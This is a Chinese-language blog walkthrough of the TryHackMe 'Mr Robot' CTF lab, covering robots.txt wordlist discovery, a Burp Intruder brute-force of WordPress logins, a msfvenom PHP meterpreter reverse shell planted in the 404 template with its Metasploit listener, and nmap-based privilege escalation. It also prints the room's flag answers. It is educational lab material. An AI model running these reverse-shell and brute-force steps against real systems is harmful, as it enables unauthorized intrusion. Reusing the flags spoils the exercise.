Mr Robot CTF「ROBOTS.TXT 信息泄露+WP爆破」

TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG!

MR.ROBOT

Mr Robot CTF「ROBOTS.TXT 信息泄露+WP爆破」

THM靶场:Mr Robot CTF

本来这个礼拜打算继续做靶场GAME ZONE,那是一个sql注入的靶场,因为之前对sql注入漏洞了解的比较多,几乎很快就做完了,结果当我今天(周五)准备写博客时,发现我的THM会员过期了,我直接WTF?花了十刀充值了,结果系统不知道为啥抽风了,一天都没有到账,我赶快补救了下,这次的靶场比较简单,主要是利用robots.txt泄露的一个字典文件对WP的用户名密码进行爆破,最终提权至root,但是也是比较有意思的一个靶场,不得不说页面做的挺酷炫的,but just so so~Let’s HACK IT ! ! !

I AM ROBOT?


连接上靶机,有一段十分炫酷的代码,意思是如果你厌倦了这个社会balabalabala,有兴趣的可以看一下:
首页

但是我们还是常规套路(冷酷),使用nmap扫描,然后cat获取扫描果:

nmap -p- -sC -sV -T4 -vv 10.10.255.128 -on nmap/initial //扫描开始,将结果保存在nmap/initial中
cat nmap/initial //获取扫描结果

开始扫描

扫描太慢了,们直接推测,题中说robots,是不是有可能是在robots.txt中有提示呢?Robots.txt 是网站管理员创建的一个文本文件,用于指导网络机器人(通常是搜索引擎机器人)如何抓取其网站上的页面浏览robots.txt我们直接发现了第一题的flag,和一个字典,推测可能后面爆破后台用的上

Q1:What is key 1?
A1:073403c8a58a1f80d943455fb30724b9

接下来,gobuster来爆破一波网站目录,命令如下:

gobuster dir -u http://10.10.255.128/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  --status-codes 200

扫描结果

可以看出,我们还是爆出来了许多有用的目录的,admin、login应该就是登录页面了,我们先试一波login,显而易见是一个wordpress的登陆页面

wp登录页面

解答视频里说用hydra,但是我们偏不,能用burpsuit解决的问题为啥用hydra呢?直接开干!打开代理和bp,随便输一个用户名和密码,用bp抓包

抓包成功
把抓到的包送到intruder,即爆破选项,清楚所有的$符,仅仅给用户名套上符号
爆破准备
最后,在payload里将之前我们在robots文件里发现的字典导入,然后开始爆破,由于KALI这里自带的bp没有破解,速度比较慢,我直接用win10上的bp继续测试了

长度不同
可以看到,用户名为Elliot时,相应不同,为“请输入正确的密码”,由此得到用户名为Elliot,再用同样的手段爆破密码,可得到密码为ER28-0652,输入用户名和密码,我们成功进入后台!
WP后台
接下来进入Appearance –> Editor –> 404 Template,在这里我们可以执行我们的脚步,先使用msfvenomen生成我们的shell,命令如下:

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.2.118.230 LPORT=4444 -f raw -o hangzai.php

生成成功

然后使用msf设置我们的监听以获取shell,命令:

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 10.2.118.230
set LPORT 4444
run

将我们生成的shell文件放在404中上传后在URL中访问,成功获得shell:
获取shell成功
直接一顿操作,但是获取flag权限太低,获取失败,却获得了robot的密码,直接放入在线网站破解(也可使用john),得到密码为:abcdefghijklmnopqrstuvwxyz
cat flag
密码破解
使用python命令进入终端:

python -c 'import pty; pty.spawn("/bin/bash")'

然后su robot 输入密码获取root权限,获得第二个flag:
get flag
Q2:What is key 2?
A2:822c73956184f694993bede3eb39f959

现在就差最后一个flag,题目给的提示为nmap,可能是要利用nmap来提升权限,先使用命令查看有无nmap进程:

find / -perm +6000 2>/dev/null | grep '/bin/'

可以看到nmap正在运行

看了大佬的一些writeup,发现 Nmap 有一个弱点,您可以将其设置为交互模式。这允许在 nmap 内运行 shell 命令,从而帮助我们完成提权:

get all of the flag!
Q3:What is key 3?
A3:04787ddef27c3dee1ee161b21670b4e4


Mr Robot 靶场通关小结

在这个房间中,我们一起学习了利用robots.txt泄露的一个字典文件对WP的用户名密码进行爆破,最终提权至root,但是也是比较有意思的一个靶场,不得不说页面真的挺酷炫的,虽然是THM里OSCP路线最简单的一个靶场了。最后我放几张这个靶场里面的一些页面,也算是一些彩蛋吧,同时也非常欢迎大家私信我,如果觉得内容做的不错的话,也可以关注我的公众号:HACKER 航仔 以获取最新消息并与我联系,十分感谢能看到这里的各位,虽然制作不易,看到你们的点赞我还是很开心的!我们下期再见,拜了个拜~~~

”冒牌英雄“

“爱国者”

截止到博客写完前,以上所有内容均被删除,这就是自由美利坚嘛?呵呵

  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值